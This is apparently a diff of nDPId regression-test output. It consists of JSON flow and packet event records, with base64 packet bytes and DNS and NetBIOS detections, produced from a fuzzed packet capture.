00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470284936,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470284936,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470298331} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470298331}
00415{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":358,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470284936,"pkt":"ADBUADRWAODtAW69JXMAAABIauUAAIARTGzAqFwCwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00401{"packet_event_id":1,"packet_event_name":"packet","packet_id":358,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470284936,"pkt":"ADBUADRWAODtAW69JXMAAABIauUAAIARTGzAqFwCwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":358,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470299325} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":358,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470299325}
00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470301328,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"flow_datalink":1,"flow_max_packets":3} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470301328,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"flow_datalink":1,"flow_max_packets":3}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1120470301328,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470301328,"pkt":"ADBUADRWAODtAW69CABFAABIauYAAIB\/TGvAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYnliZXJjaXR5AmRrAAAhAAE="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1120470301328,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470301328,"pkt":"ADBUADRWAODtAW69CABFAABIauYAAIB\/TGvAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJYnliZXJjaXR5AmRrAAAhAAE="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1120470303331,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470303331,"pkt":"ADBUADRWAODtAW69CABFBABIaucAAIARTGrAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1120470303331,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470303331,"pkt":"ADBUADRWAODtAW69CABFBABIaucAAIARTGrAqAECwKgBAQrSADUANCnz\/\/8BAAABAAAAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470303331,"flow_last_seen":1120470303331,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470303331,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00430{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470303331,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAFhOaugAAIARS2XAqAECwKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470303331,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAFhOaugAAIARS2XAqAECwKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470303562} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":361,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120470303562}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1120470304312,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABO7ukAAIARS2TAqAECeKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUKqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1120470304312,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABO7ukAAIARS2TAqAECeKgB\/wCJAIkAOlt2hSUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUKqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470304312,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00412{"packet_event_id":1,"packet_event_name":"packet","packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120470304312,"pkt":"\/\/\/\/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470305063} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470305063}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1120470307336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470307336,"pkt":"AFNUADRWAEjtAW69CABFAABIausAAIARTGbAqAECwKgBAQrSADUANCnz\/\/8BAABGAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1120470307336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470307336,"pkt":"AFNUADRWAEjtAW69CABFAABIausAAIARTGbAqAECwKgBAQrSADUANCnz\/\/8BAABGAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -667,8 +667,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1120470315340,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470315340,"pkt":"AODtAW68ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtMARwmH\/eCAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQBhJxAACwlsb2NhbGhvc3QA"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1120470315340,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470315340,"pkt":"AODtAW68ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtMARwmH\/eCAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQBhJxAACwlsb2NhbGhvc3QA"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470315340,"pkt":"ADBUADRWAODtAW69CABFAAAhau0AUoARGB8NqAEC1PIhIxPEE8QADcBLICAgNiA="} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470315340,"pkt":"ADBUADRWAODtAW69CABFAAAhau0AUoARGB8NqAEC1PIhIxPEE8QADcBLICAgNiA="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13,"global_ts_msec":1120470315341} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13,"global_ts_msec":1120470315341}
